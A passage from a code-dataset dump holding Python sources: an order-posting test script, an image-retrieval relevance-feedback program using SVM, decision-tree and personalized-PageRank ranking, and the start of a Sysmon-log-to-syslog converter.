data[0][\"OrderNumber\"] = on\n data[0][\"Weight\"] = ramdom_decimal(10, 3)\n data[0][\"Length\"] = ramdom_decimal(10, 0)\n data[0][\"Height\"] = ramdom_decimal(10, 0)\n data[0][\"PackageVolume\"] = ramdom_decimal(10, 0)\n data[0][\"TrackingNumber\"] = random.randint(10000000000, 90000000000)\n orderid = post_basic(u=urls[\"orderurl\"], d=data, authorizaiton=1)\n lock.release()\n return orderid\n\n\nif __name__ == \"__main__\":\n '''start = time.time()\n lock = threading.Lock()\n for i in range(100):\n t = threading.Thread(target=order_thread, args=(\"20190411199999\", i))\n t.start()\n for i in range(100):\n on = \"20190417111111\" + str(i + 1)\n print(on)\n # random.randint(5,30)\n data[0][\"OrderNumber\"] = on\n data[0][\"Weight\"] = ramdom_decimal(10, 3)\n data[0][\"Length\"] = ramdom_decimal(10, 0)\n data[0][\"Height\"] = ramdom_decimal(10, 0)\n data[0][\"PackageVolume\"] = ramdom_decimal(10, 0)\n data[0][\"TrackingNumber\"] = random.randint(10000000000, 90000000000)\n result = post_basic(u=urls[\"orderurl\"],d=data,authorizaiton=1)\n print(result)\n end = time.time()-start\n print(end)\n \n url = \"http://10.168.95.149:8022/api/OtsOpenApi\"\n\n redata= post_ots(url+\"/PredictionBatchNo\",data,authorizaiton=1)\n '''\n header_test[\"Authorization\"] = \"Basic {}\".format(get_authorizaiton())\n print(header_test)\n\n","sub_path":"request_order.py","file_name":"request_order.py","file_ext":"py","file_size_in_byte":6783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"65920055","text":"from utils.cli_options import *\nfrom utils.similarity_measures import *\nimport numpy as np\nfrom sklearn.decomposition import PCA\nfrom sklearn.decomposition import TruncatedSVD\nimport os\nimport pickle\nimport pagerank as pagerank\nimport scipy.sparse as sparse\nimport h5py\nimport task5 as lsh\nimport cvxopt\nimport cvxopt.solvers\nfrom cvxopt import matrix as cvxopt_matrix\nfrom cvxopt import solvers as 
cvxopt_solvers\n\n\nCURRENT_DIR = os.path.dirname(__file__)\nIMG_PREFIX = '/Hand_'\nIMG_EXT = '.jpg'\nOUTPUT_DIR = CURRENT_DIR + os.sep + '..' + os.sep + 'Outputs'\n\n\nclass Node:\n def __init__(self, gini, num_samples, num_samples_per_class, predicted_class):\n self.gini = gini\n self.num_samples = num_samples\n self.num_samples_per_class = num_samples_per_class\n self.predicted_class = predicted_class\n self.feature_index = 0\n self.threshold = 0\n self.left = None\n self.right = None\n\n\nclass DecisionTreeClassifier:\n def __init__(self, max_depth = None):\n self.max_depth = max_depth\n\n def _best_split(self, X, y):\n # Need at least two elements to split a node.\n m = y.size\n if m <= 1:\n return None, None\n\n # Count of each class in the current node.\n num_parent = [np.sum(y == c) for c in range(self.n_classes_)]\n\n # Gini of current node.\n best_gini = 1.0 - sum((n / m) ** 2 for n in num_parent)\n best_idx, best_thr = None, None\n\n # Loop through all features.\n for idx in range(self.n_features_):\n # Sort data along selected feature.\n thresholds, classes = zip(*sorted(zip(X[:, idx], y)))\n\n # We could actually split the node according to each feature/threshold pair\n # and count the resulting population for each class in the children, but\n # instead we compute them in an iterative fashion, making this for loop\n # linear rather than quadratic.\n num_left = [0] * self.n_classes_\n num_right = num_parent.copy()\n for i in range(1, m): # possible split positions\n c = classes[i - 1]\n num_left[c] += 1\n num_right[c] -= 1\n gini_left = 1.0 - sum(\n (num_left[x] / i) ** 2 for x in range(self.n_classes_)\n )\n gini_right = 1.0 - sum(\n (num_right[x] / (m - i)) ** 2 for x in range(self.n_classes_)\n )\n\n # The Gini impurity of a split is the weighted average of the Gini\n # impurity of the children.\n gini = (i * gini_left + (m - i) * gini_right) / m\n\n # The following condition is to make sure we don't try to split two\n # points with identical values for that feature, as it is impossible\n # (both have to end up on the same side of a split).\n if thresholds[i] == thresholds[i - 1]:\n continue\n\n if gini < best_gini:\n best_gini = gini\n best_idx = idx\n best_thr = (thresholds[i] + thresholds[i - 1]) / 2 # midpoint\n\n return best_idx, best_thr\n\n def fit(self, X, y):\n \"\"\"Build decision tree classifier.\"\"\"\n self.n_classes_ = len(set(y)) # classes are assumed to go from 0 to n-1\n self.n_features_ = X.shape[1]\n self.tree_ = self._grow_tree(X, y)\n\n def _grow_tree(self, X, y, depth = 0):\n \"\"\"Build a decision tree by recursively finding the best split.\"\"\"\n # Population for each class in current node. 
The predicted class is the one with\n        # largest population.\n        num_samples_per_class = [np.sum(y == i) for i in range(self.n_classes_)]\n        predicted_class = np.argmax(num_samples_per_class)\n        node = Node(\n            gini = self._gini(y),\n            num_samples = y.size,\n            num_samples_per_class = num_samples_per_class,\n            predicted_class = predicted_class,\n        )\n\n        # Split recursively until maximum depth is reached.\n        if depth < self.max_depth:\n            idx, thr = self._best_split(X, y)\n            if idx is not None:\n                indices_left = X[:, idx] < thr\n                X_left, y_left = X[indices_left], y[indices_left]\n                X_right, y_right = X[~indices_left], y[~indices_left]\n                node.feature_index = idx\n                node.threshold = thr\n                node.left = self._grow_tree(X_left, y_left, depth + 1)\n                node.right = self._grow_tree(X_right, y_right, depth + 1)\n        return node\n\n    def predict(self, X):\n        return [self._predict(inputs) for inputs in X]\n\n    def _predict(self, inputs):\n        \"\"\"Predict class for a single sample.\"\"\"\n        node = self.tree_\n        while node.left:\n            if inputs[node.feature_index] < node.threshold:\n                node = node.left\n            else:\n                node = node.right\n        return node.predicted_class\n\n    def _gini(self, y):\n        m = y.size\n        return 1.0 - sum((np.sum(y == c) / m) ** 2 for c in range(self.n_classes_))\n\n\ndef input_rel_irrelevant_image_ids(is_relevant=True, relevant_set=None):\n    image_ids = []\n    if is_relevant:\n        print('Enter relevant image ids as comma separated value:')\n    else:\n        print('Enter irrelevant image ids as comma separated value:')\n    input_str = input()\n    input_ids = []\n    if input_str.strip() != '':\n        input_ids = [x.strip() for x in input_str.split(',')]\n\n    if is_relevant:\n        if not relevant_set:\n            relevant_set = []\n        for img_id in input_ids:\n            if img_id not in relevant_set:\n                image_ids.append(img_id)\n    else:\n        if not relevant_set:\n            relevant_set = []\n\n        for img_id in input_ids:\n            # record every irrelevant id; if it was previously marked relevant, unmark it\n            if img_id in relevant_set:\n                relevant_set.remove(img_id)\n            image_ids.append(img_id)\n\n    return image_ids, relevant_set\n\n    # so that we can avoid duplicates\n    # if image_id not in image_ids:\n    #     image_ids.append(image_id)\n    #\n    # while image_id != '-1':\n    #     image_id = input()\n    #     if image_id == '-1':\n    #         break\n    #     image_ids.append(image_id)\n    #\n    # return image_ids\n\n\nclass ImageSimilarity:\n    def __init__(self, image_id, similarity):\n        self.image_id = image_id\n        self.similarity = similarity\n\n\ndef dimension_reduction(X, k, selected_model, dim_reduction_tech, input_images):\n    model = get_feature_model(selected_model)\n    dim_reduction_model = get_dim_reduction_tech(dim_reduction_tech)\n\n    top_dim = 10\n\n    # PCA\n    if dim_reduction_tech == \"1\":\n        pca = PCA(n_components = top_dim)\n        U, _, V = pca._fit(X)\n        latent_features = U[:, :top_dim]\n\n    # SVD\n    elif dim_reduction_tech == \"2\":\n        # U, _, V = np.linalg.svd(X)\n        svd = TruncatedSVD(n_components=top_dim)\n        U = svd.fit_transform(np.array(X))\n        latent_features = U[:, :top_dim]\n\n    # TODO: STORE THE SIMILARITY DICT IN H5py or pickle object beforehand\n    # Find the similarity\n    similarity_dict = {}\n    lf_len = len(latent_features)\n\n    for i in range(lf_len):\n        for j in range(lf_len):\n            if i == j:\n                continue\n\n            # dist = euclidean_distance(list(latent_features[i]), list(latent_features[j]))\n            sim = cosine_similarity(list(latent_features[i]), list(latent_features[j]))\n            # sim = round((1 / dist) * 1000, 4)\n            # Here we just have the input image ids not the input image object as we don't depend on the data set\n            img_sim = ImageSimilarity(input_images[j], sim)\n\n            if input_images[i] not in similarity_dict:\n                
similarity_dict[input_images[i]] = [img_sim]\n else:\n similarity_dict[input_images[i]].append(img_sim)\n\n # Sort the similarity graph (dictionary)\n for key, val in similarity_dict.items():\n similarity_dict[key] = sorted(val, key = lambda x: x.similarity, reverse = True)\n # chose the top k related images\n similarity_dict[key] = similarity_dict[key][:k]\n\n # Normalize the values to sum of 1\n\n return similarity_dict\n\n\ndef ppr(similarity_dict, images, K):\n related_images = []\n weights = []\n personalize = []\n image_id_map = {}\n temp = 0\n for k, v in similarity_dict.items():\n image_id_map[k] = temp\n temp += 1\n\n for k, v in similarity_dict.items():\n found = False\n for j in images:\n if j == k:\n personalize.append(1/(len(images)))\n found = True\n break\n if not found :\n personalize.append(0)\n\n for i in v:\n edge = []\n edge.append(image_id_map[k])\n edge.append(image_id_map[i.image_id])\n related_images.append(edge)\n weights.append(i.similarity)\n # print('\\n')\n\n A = np.array(related_images)\n weights = np.array(weights)\n G = sparse.csr_matrix((weights, (A[:, 0], A[:, 1])), shape=(len(similarity_dict), len(similarity_dict)))\n personalize = np.array(personalize)\n # pr = pagerank.pagerank_power(G, p=0.85, personalize=None, tol=1e-6, max_iter=200)\n pr = pagerank.personalizedPageRank(G, personalize, c=0.20, allowedDiff=1e-9, maxIters=200)\n pr_sorted = np.argsort(pr)\n pr_sorted = pr_sorted[::-1]\n\n img_ppr = []\n # print('\\nPersonalized Page ranking are:\\n-------------------------------------------')\n\n # for t in range(0, K):\n for t in range(len(pr_sorted)):\n id = pr_sorted[t]\n score = pr[id]\n for image_id, node_id in image_id_map.items():\n if node_id == id:\n # no need to print score for the image\n # print('\\n')\n # print('Image ID ' + str(t + 1) + ': ' + image_id + ' : ' + str(score))\n\n # Store the information to display it using matplot\n temp = [image_id, score]\n img_ppr.append(temp)\n return img_ppr\n\n\n# print formatted search results\ndef print_ranked_results(similarity_list, relevant_images=None):\n print('\\nRanked result set from task 5:')\n print('Image ID: Score')\n\n if relevant_images:\n rel_img_id = relevant_images[0]\n lsh_index = lsh.LSHIndex()\n q_img_idx = lsh_index.image_id_map[rel_img_id]\n\n for i in range(len(similarity_list)):\n print(similarity_list[i][0] + ' : ' + str(similarity_list[i][2]))\n # if similarity_list[i][0] == rel_img_id:\n # q_img_idx = i\n\n satisfied = input(\"\\nDo you want to visualize the result set? [Enter 'yes' or 'no']\\n\")\n if satisfied == 'yes':\n\n lsh_index.visualize_similar_results(q_img_idx, len(similarity_list), similarity_list)\n else:\n for i in range(len(similarity_list)):\n print(similarity_list[i][0] + ' : ' + str(similarity_list[i][2]))\n\n print()\n\n# print formatted search results\ndef print_ranked_results_v2(query_image_id, ranked_image_ids, scores, total_images):\n print('\\nRanked result set from task 5:')\n print('Image ID: Score')\n\n lsh_index = lsh.LSHIndex()\n\n counter = 0\n for ranked_image_id, score in zip(ranked_image_ids, scores):\n if counter == total_images:\n break\n print(ranked_image_id + ' : ' + str(score))\n counter += 1\n\n is_visualize = input(\"\\nDo you want to visualize the result set? 
[Enter 'yes' or 'no']\\n\")\n if is_visualize == 'yes':\n lsh_index.visualize_similar_results_v2(query_image_id, ranked_image_ids, scores, total_images)\n\n print()\n\ndef polynomial_kernel(x1,x2,p =3):\n return (1 + np.dot(x1, x2)) ** p\n\n\ndef rbf_kernel(x1,x2):\n return np.exp(-0.5*np.sum((x1-x2)**2))\n\ndef run_task():\n # selected_model = choose_feature_model()\n selected_model = \"1\"\n # dim_reduction_tech = choose_dim_reduction_tech()\n dim_reduction_tech = \"2\"\n rel_feed_model = choose_relevance_feedback_model()\n\n # read task 5 output - ranked images\n similarity_list = None\n similarity_dict = {}\n T = -1\n ranked_res_pickle = OUTPUT_DIR + os.sep + 'Task_5' + os.sep + 'task5_output.pkl'\n if os.path.exists(ranked_res_pickle):\n with open(ranked_res_pickle, 'rb') as handle:\n similarity_list = pickle.load(handle)\n T = len(similarity_list)\n\n # lsh_similarity_list = list(similarity_list)\n\n # has feature vectors for similar images only\n feature_matrix = []\n # display existing ranked results for the user to pick relevant and irrelevant images\n # console_msg = 'Image ID: Score Image ID: Score Image ID: Score Image ID: Score Image ID: Score ' \\\n # 'Image ID: Score Image ID: Score Image ID: Score'\n\n hdf5_file = CURRENT_DIR + os.sep + '..' + os.sep + 'Metadata' + os.sep + 'feature_vectors_full_data.hdf5'\n data_cm = None\n with h5py.File(hdf5_file, 'r') as hf:\n data_cm = hf['hog_features'][:]\n\n # method call to format and print search results\n # passing first result as relevant set so that it can be used for html visualization\n print_ranked_results(similarity_list, [similarity_list[0][0]])\n\n ranked_image_ids = []\n for i in range(len(similarity_list)):\n # if i % 8 == 0:\n # console_msg += '\\n'\n # else:\n # console_msg += ', '\n # console_msg += similarity_list[i][0] + (\" : %.7f\" % (similarity_list[i][2]))\n\n similarity_dict[similarity_list[i][0]] = similarity_list[i][2]\n\n h5_image_idx = similarity_list[i][1]\n feature_vector = data_cm[h5_image_idx]\n feature_matrix.append(feature_vector)\n\n ranked_image_ids.append(similarity_list[i][0])\n\n # print('Ranked result set from task 5:')\n # print(console_msg + '\\n')\n\n # get user input for relevant and irrelevant images\n # the relevant image set will always have the initial user query image id\n relevant_set = [ranked_image_ids[0]]\n relevant_set_temp, _ = input_rel_irrelevant_image_ids() # is a list of image_id's\n relevant_set += relevant_set_temp\n irrelevant_set, relevant_set = input_rel_irrelevant_image_ids(is_relevant=False, relevant_set=relevant_set)\n\n lsh_index = lsh.LSHIndex()\n data_hog_ = lsh_index.data_hog_\n binary_data_hog_ = np.ones(data_hog_.shape) * (data_hog_ > np.mean(data_hog_, axis=0))\n\n # TODO: add SVM relevance feedback system code\n if rel_feed_model == \"1\":\n provide_rel_feedback = 'yes'\n top_irr_to_discard = 5\n t_rel = T\n\n query_image_id = relevant_set[0]\n query_image_features = feature_matrix[0]\n\n while 'yes' in provide_rel_feedback:\n\n #top_results_considered = T // len(relevant_set)\n X = []\n y = []\n # Relevant = 0\n # Irrelevant = 1\n for ranked_image_id, feature_row in zip(ranked_image_ids, feature_matrix):\n if ranked_image_id in relevant_set:\n y.append(1)\n X.append(feature_row)\n elif ranked_image_id in irrelevant_set:\n y.append(-1)\n X.append(feature_row)\n\n X = np.array(X)\n y = np.array(y)\n n = X.shape[0] #len(X)\n K = np.zeros((n, n))\n for i in range(n):\n for j in range(n):\n K[i][j] = y[i] * y[j] * polynomial_kernel(X[i], X[j])\n P = 
cvxopt_matrix(K)\n q = cvxopt_matrix(np.ones(n) * -1)\n A = y.reshape((1, n))\n A = cvxopt_matrix(A.astype('double'))\n C = 5\n # A = matrix(y, (1, n), tc='d')\n b = cvxopt_matrix(0, tc='d')\n temp1 = np.identity(n) * -1\n temp2 = np.identity(n)\n G = cvxopt_matrix(np.vstack((temp1, temp2)))\n temp3 = cvxopt_matrix(np.zeros(n))\n temp4 = cvxopt_matrix(np.ones(n) * C)\n h = cvxopt_matrix(np.vstack((temp3, temp4)))\n cvxopt_solvers.options['show_progress'] = False\n solution = cvxopt_solvers.qp(P, q, G, h, A, b)\n alphas = np.array(solution['x']).reshape(n)\n support_vectors = np.where(alphas > 1e-7)[0][0]\n b = y[support_vectors] - sum(alphas * y * polynomial_kernel(X, X[support_vectors]))\n # Model fit\n \n \n irrelevant_related_images = []\n for i in range(len(irrelevant_set)):\n results_for_this_image = lsh_index.query_image(irrelevant_set[i])\n # print(results_for_this_image, irrelevant_set[i],' are the results')\n if len(results_for_this_image) > top_irr_to_discard:\n results_for_this_image = results_for_this_image[:top_irr_to_discard]\n\n for result in results_for_this_image:\n irrelevant_related_images.append(result[0])\n\n # TODO: make sure to have query image vector as well\n # best we can include all the results from\n # do lsh using irrelevant as well and remove some images from actual image query\n # and remove unwanted from actual result set\n rel_result_sets = {}\n images_included_in_result_set = []\n xyz = 0\n for i in range(len(relevant_set)):\n results_for_this_image = lsh_index.query_image(relevant_set[i])\n result_count_included = 0\n top_results = []\n #for result in results_for_this_image[:top_results_considered]:\n for result in results_for_this_image:\n # if result_count_included > t_rel:\n # break\n\n if result[0] not in images_included_in_result_set:\n top_results.append(result)\n images_included_in_result_set.append(result[0])\n result_count_included += 1\n\n # if len(results_for_this_image) > t_rel:\n # results_for_this_image = results_for_this_image[:t_rel]\n\n # rel_result_sets[relevant_set[i]] = results_for_this_image\n rel_result_sets[relevant_set[i]] = top_results\n xyz += len(top_results)\n\n for rel_id,image_list in rel_result_sets.items():\n temp = []\n for im in image_list:\n if im not in irrelevant_related_images:\n temp.append(im)\n\n rel_result_sets[rel_id] = temp\n\n\n feature_matrix = []\n new_image_ids = []\n for k, v in rel_result_sets.items():\n for result in v:\n h5_image_idx = result[1]\n img_id = result[0]\n if img_id not in irrelevant_set:\n new_image_ids.append(img_id)\n feature_vector = data_cm[h5_image_idx]\n feature_matrix.append(feature_vector)\n\n\n latent_features_unlabelled = feature_matrix\n predict = np.zeros(len(latent_features_unlabelled))\n\n for i in range(len(latent_features_unlabelled)):\n asum = 0\n vector = latent_features_unlabelled[i]\n asum = sum(alphas*y*polynomial_kernel(X,vector)) + b\n predict[i] = np.sign(asum)\n results = predict\n #Prediction done\n\n final_image_ids = []\n final_feature_matrix = []\n\n for new_image_id, feature_vector, prediction in zip(new_image_ids, feature_matrix, results):\n # relevant\n if prediction == 1:\n final_image_ids.append(new_image_id)\n final_feature_matrix.append(feature_vector)\n\n # distance of each new image ID(all relevant) from query image\n final_image_distances = [np.linalg.norm(feature_vector - query_image_features)\n for feature_vector in final_feature_matrix]\n\n # sorting relevant image IDs based on distance from query image\n ranked_image_ids = [x for _, x in 
sorted(zip(final_image_distances, final_image_ids), key=lambda pair: pair[0])]\n feature_matrix = [x for _, x in sorted(zip(final_image_distances, final_feature_matrix), key=lambda pair: pair[0])]\n final_image_distances.sort()\n\n final_image_scores = []\n for final_image_distance in final_image_distances:\n final_image_scores.append(1 / (1+final_image_distance))\n\n\n print_ranked_results_v2(query_image_id, ranked_image_ids, final_image_scores, t_rel)\n # print('New results based on relevace feedback(renewd query formation):\\nImage ID : Score')\n # for ranked_image_id, final_image_score in zip(ranked_image_ids, final_image_scores):\n # print(f'{ranked_image_id} : {final_image_score}')\n\n provide_rel_feedback = input(\"Do you want to provide relevance feedback? [Enter 'yes' or 'no']\\n\")\n\n if 'yes' in provide_rel_feedback:\n # get user input for relevant and irrelevant images\n # relevant_set += input_rel_irrelevant_image_ids()\n # irrelevant_set += input_rel_irrelevant_image_ids(is_relevant = False)\n relevant_set_temp, _ = input_rel_irrelevant_image_ids() # is a list of image_id's\n relevant_set += relevant_set_temp\n irrelevant_set_temp, relevant_set = input_rel_irrelevant_image_ids(is_relevant=False,\n relevant_set=relevant_set)\n irrelevant_set += irrelevant_set_temp\n\n \n #################################### DECISION TREE ####################################\n elif rel_feed_model == \"2\":\n\n provide_rel_feedback = 'yes'\n t_rel = T #len(similarity_list)\n top_irr_to_discard = 5\n\n query_image_id = relevant_set[0]\n query_image_features = feature_matrix[0]\n\n while 'yes' in provide_rel_feedback:\n\n top_results_considered = T // len(relevant_set)\n\n X = []\n y = []\n # Relevant = 0\n # Irrelevant = 1\n for ranked_image_id, feature_row in zip(ranked_image_ids, feature_matrix):\n if ranked_image_id in relevant_set:\n y.append(0)\n X.append(feature_row)\n elif ranked_image_id in irrelevant_set:\n y.append(1)\n X.append(feature_row)\n\n X = np.array(X)\n y = np.array(y)\n\n clf = DecisionTreeClassifier(max_depth = 5)\n clf.fit(X, y)\n\n # NEW LOGIC\n\n irrelevant_related_images = []\n for i in range(len(irrelevant_set)):\n results_for_this_image = lsh_index.query_image(irrelevant_set[i])\n if len(results_for_this_image) > top_irr_to_discard:\n results_for_this_image = results_for_this_image[:top_irr_to_discard]\n\n for result in results_for_this_image:\n irrelevant_related_images.append(result[0])\n\n # # TODO: make sure to have query image vector as well\n # # best we can include all the results from\n # # do lsh using irrelevant as well and remove some images from actual image query\n # # and remove unwanted from actual result set\n # rel_result_sets = {}\n # images_included_in_result_set = []\n # for i in range(len(relevant_set)):\n # results_for_this_image = lsh_index.query_image(relevant_set[i])\n # result_count_included = 0\n # top_results = []\n # for result in results_for_this_image[:top_results_considered]:\n # if result_count_included > t_rel:\n # break\n # if result[0] not in images_included_in_result_set:\n # top_results.append(result)\n # images_included_in_result_set.append(result[0])\n # result_count_included += 1\n #\n # rel_result_sets[relevant_set[i]] = top_results\n\n # TODO: make sure to have query image vector as well\n # best we can include all the results from\n # do lsh using irrelevant as well and remove some images from actual image query\n # and remove unwanted from actual result set\n rel_result_sets = {}\n images_included_in_result_set = []\n xyz = 
0\n for i in range(len(relevant_set)):\n results_for_this_image = lsh_index.query_image(relevant_set[i])\n result_count_included = 0\n top_results = []\n # for result in results_for_this_image[:top_results_considered]:\n for result in results_for_this_image:\n # if result_count_included > t_rel:\n # break\n\n if result[0] not in images_included_in_result_set:\n top_results.append(result)\n images_included_in_result_set.append(result[0])\n result_count_included += 1\n\n # if len(results_for_this_image) > t_rel:\n # results_for_this_image = results_for_this_image[:t_rel]\n\n # rel_result_sets[relevant_set[i]] = results_for_this_image\n rel_result_sets[relevant_set[i]] = top_results\n xyz += len(top_results)\n\n for rel_id, image_list in rel_result_sets.items():\n temp = []\n for im in image_list:\n if im not in irrelevant_related_images:\n temp.append(im)\n\n rel_result_sets[rel_id] = temp\n\n feature_matrix = []\n new_image_ids = []\n for k, v in rel_result_sets.items():\n for result in v:\n h5_image_idx = result[1]\n img_id = result[0]\n if img_id not in irrelevant_set:\n new_image_ids.append(img_id)\n feature_vector = data_cm[h5_image_idx]\n feature_matrix.append(feature_vector)\n\n predictions = clf.predict(feature_matrix)\n\n # predicted 'relevant' by decision tree\n final_image_ids = []\n final_feature_matrix = []\n\n for new_image_id, feature_vector, prediction in zip(new_image_ids, feature_matrix, predictions):\n # relevant\n if prediction == 0:\n final_image_ids.append(new_image_id)\n final_feature_matrix.append(feature_vector)\n\n # distance of each new image ID(all relevant) from query image\n final_image_distances = [np.linalg.norm(feature_vector - query_image_features)\n for feature_vector in final_feature_matrix]\n\n # sorting relevant image IDs based on distance from query image\n ranked_image_ids = [x for _, x in sorted(zip(final_image_distances, final_image_ids), key=lambda pair: pair[0])]\n feature_matrix = [x for _, x in sorted(zip(final_image_distances, final_feature_matrix), key=lambda pair: pair[0])]\n final_image_distances.sort()\n\n final_image_scores = []\n for final_image_distance in final_image_distances:\n if final_image_distance != 0:\n final_image_scores.append(1 / final_image_distance)\n else:\n final_image_scores.append(1)\n\n print_ranked_results_v2(query_image_id, ranked_image_ids, final_image_scores, t_rel)\n # print('New results based on relevace feedback(renewd query formation):\\nImage ID : Score')\n # for ranked_image_id, final_image_score in zip(ranked_image_ids[:t_rel], final_image_scores[:t_rel]):\n # print(f'{ranked_image_id} : {final_image_score}')\n\n provide_rel_feedback = input(\"Do you want to provide relevance feedback? 
[Enter 'yes' or 'no']\\n\")\n\n if 'yes' in provide_rel_feedback:\n # get user input for relevant and irrelevant images\n # relevant_set += input_rel_irrelevant_image_ids()\n # irrelevant_set += input_rel_irrelevant_image_ids(is_relevant = False)\n relevant_set_temp, _ = input_rel_irrelevant_image_ids() # is a list of image_id's\n relevant_set += relevant_set_temp\n irrelevant_set_temp, relevant_set = input_rel_irrelevant_image_ids(is_relevant=False,\n relevant_set=relevant_set)\n irrelevant_set += irrelevant_set_temp\n\n # PPR based relevance feedback system\n elif rel_feed_model == \"3\":\n number_of_edges = 10\n number_of_edges_irr = 7\n t_rel = 20\n top_irr_to_discard = 5\n\n provide_rel_feedback = 'yes'\n\n while 'yes' in provide_rel_feedback:\n irrelevant_related_images = []\n irr_result_sets = {}\n for i in range(len(irrelevant_set)):\n results_for_this_image = lsh_index.query_image(irrelevant_set[i])\n if len(results_for_this_image) > top_irr_to_discard:\n results_for_this_image = results_for_this_image[:t_rel]\n\n irr_result_sets[irrelevant_set[i]] = results_for_this_image\n # for result in results_for_this_image:\n # top_results.append(result)\n # irrelevant_related_images.append(result[0])\n irr_feature_matrix = []\n irr_image_ids = []\n for k, v in irr_result_sets.items():\n for result in v:\n h5_image_idx = result[1]\n img_id = result[0]\n if img_id not in irr_image_ids:\n irr_image_ids.append(img_id)\n feature_vector = data_cm[h5_image_idx]\n irr_feature_matrix.append(feature_vector)\n\n similarity_dict_2 = dimension_reduction(np.array(irr_feature_matrix), number_of_edges_irr, selected_model,\n dim_reduction_tech,\n irr_image_ids)\n irrel_img_ppr = ppr(similarity_dict_2, irrelevant_set, len(irr_feature_matrix))\n # Found after multiple run that we will have around 3 irrelevant images for each irrelevant marked\n # images by the user, so we remove len of user irrelevant set * 3\n irrel_img_ppr = irrel_img_ppr[:(len(irrelevant_set)*3)]\n\n for ir_ppr in irrel_img_ppr:\n irrelevant_related_images.append(ir_ppr[0])\n\n # TODO: make sure to have query image vector as well\n # best we can include all the results from\n # do lsh using irrelevant as well and remove some images from actual image query\n # and remove unwanted from actual result set\n rel_result_sets = {}\n images_included_in_result_set = []\n for i in range(len(relevant_set)):\n results_for_this_image = lsh_index.query_image(relevant_set[i])\n result_count_included = 0\n top_results = []\n for result in results_for_this_image:\n if result_count_included > t_rel:\n break\n\n if result[0] not in images_included_in_result_set:\n top_results.append(result)\n images_included_in_result_set.append(result[0])\n result_count_included += 1\n\n # if len(results_for_this_image) > t_rel:\n # results_for_this_image = results_for_this_image[:t_rel]\n\n # rel_result_sets[relevant_set[i]] = results_for_this_image\n rel_result_sets[relevant_set[i]] = top_results\n\n feature_matrix = []\n new_image_ids = []\n for k, v in rel_result_sets.items():\n for result in v:\n h5_image_idx = result[1]\n img_id = result[0]\n if img_id not in irrelevant_set and img_id not in irrelevant_related_images:\n new_image_ids.append(img_id)\n feature_vector = data_cm[h5_image_idx]\n feature_matrix.append(feature_vector)\n\n similarity_dict_ = dimension_reduction(np.array(feature_matrix), number_of_edges, selected_model, dim_reduction_tech,\n new_image_ids)\n rel_img_ppr = ppr(similarity_dict_, relevant_set, len(feature_matrix))\n ppr_ranked_images = []\n\n 
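# NOTE: ppr() is assumed to yield (image_id, score) pairs already sorted by score; the\n            # loop below flattens that ranking, then rebuilds similarity_list (capped at the\n            # original result-set size) via lsh_index.image_id_map to recover each image's\n            # HDF5 row index.\n            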
for ppr1 in rel_img_ppr:\n ppr_ranked_images.append(ppr1[0])\n\n counter = 0\n user_specified_t = len(similarity_list)\n similarity_list = []\n for ppr1 in rel_img_ppr:\n if counter == user_specified_t:\n break\n if ppr1[0] in ppr_ranked_images:\n img_id = ppr1[0]\n img_score = ppr1[1]\n h5_image_idx = lsh_index.image_id_map[img_id]\n temp = (img_id, h5_image_idx, img_score)\n similarity_list.append(temp)\n counter += 1\n\n # print the new result set obtained after including relevance feedback\n print_ranked_results(similarity_list, relevant_set)\n\n provide_rel_feedback = input(\"Do you want to provide relevance feedback? [Enter 'yes' or 'no']\\n\")\n\n if 'yes' in provide_rel_feedback:\n # get user input for relevant and irrelevant images\n # relevant_set += input_rel_irrelevant_image_ids()\n # irrelevant_set += input_rel_irrelevant_image_ids(is_relevant = False)\n relevant_set_temp, _ = input_rel_irrelevant_image_ids() # is a list of image_id's\n relevant_set += relevant_set_temp\n irrelevant_set_temp, relevant_set = input_rel_irrelevant_image_ids(is_relevant=False,\n relevant_set=relevant_set)\n irrelevant_set += irrelevant_set_temp\n\n # TODO: RFeedback with new query formulation\n elif rel_feed_model == \"4\":\n provide_rel_feedback = 'yes'\n\n while 'yes' in provide_rel_feedback:\n relevant_index = [lsh_index.image_id_map[u] for u in relevant_set]\n irrelevant_index = [lsh_index.image_id_map[u] for u in irrelevant_set]\n\n similarity_index = [u for _, u, _ in similarity_list]\n\n p_i_relevant = np.sum(binary_data_hog_[relevant_index], axis=0) / len(relevant_index)\n p_i_irrelevant = np.sum(binary_data_hog_[irrelevant_index], axis=0) / len(irrelevant_index)\n\n ratio = (p_i_relevant + 1e-6) / (p_i_irrelevant + 1e-6)\n\n # term_values1 = p_i*(1-u_i)/(1-p_i)\n # term_values2 = u_i\n term_values_log = np.log(ratio)\n term_values_log = term_values_log.reshape((-1, 1))\n ranked_list_matrix = binary_data_hog_[similarity_index]\n\n new_similarity_score_list = np.dot(ranked_list_matrix, term_values_log)\n new_similarity_score_list = new_similarity_score_list.reshape(-1)\n new_ranked_list = []\n for i in range(len(new_similarity_score_list)):\n sim = new_similarity_score_list[i]\n u, v, w = similarity_list[i]\n new_ranked_list.append((u, v, sim))\n new_ranked_list = sorted(new_ranked_list, key=lambda x: x[2], reverse=True)\n similarity_list = new_ranked_list\n\n print_ranked_results(similarity_list, relevant_set)\n\n provide_rel_feedback = input(\"Do you want to provide relevance feedback? 
[Enter 'yes' or 'no']\\n\")\n\n if 'yes' in provide_rel_feedback:\n # get user input for relevant and irrelevant images\n # relevant_set += input_rel_irrelevant_image_ids()\n # irrelevant_set += input_rel_irrelevant_image_ids(is_relevant=False)\n relevant_set_temp, _ = input_rel_irrelevant_image_ids() # is a list of image_id's\n relevant_set += relevant_set_temp\n irrelevant_set_temp, relevant_set = input_rel_irrelevant_image_ids(is_relevant=False,\n relevant_set=relevant_set)\n irrelevant_set += irrelevant_set_temp\n\n\nif __name__ == \"__main__\":\n run_task()","sub_path":"Code/task6.py","file_name":"task6.py","file_ext":"py","file_size_in_byte":37113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"453788422","text":"import json\n\ndef convertEvents(sysmon):\n for event in sysmon:\n if \"Microsoft-Windows-Sysmon\" in event:\n event = json.loads(event)\n \n m = event[\"message\"]\n m = m.replace(\"\\n\", \" \")\n \n if \"computer_name\" in event:\n h = event[\"computer_name\"]\n elif \"winlog\" in event:\n h = event[\"winlog\"][\"computer_name\"]\n else:\n h = \"NOHOSTNAME\"\n\n x = f\"<14>Jan 01 00:00:00 {h} Microsoft-Windows-Sysmon[2092]: {m}\"\n print(x)\n\nwith open('./caldera_attack_evals_round1_day1_2019-10-20201108.json','r') as sysmon:\n convertEvents(sysmon)\n\nwith 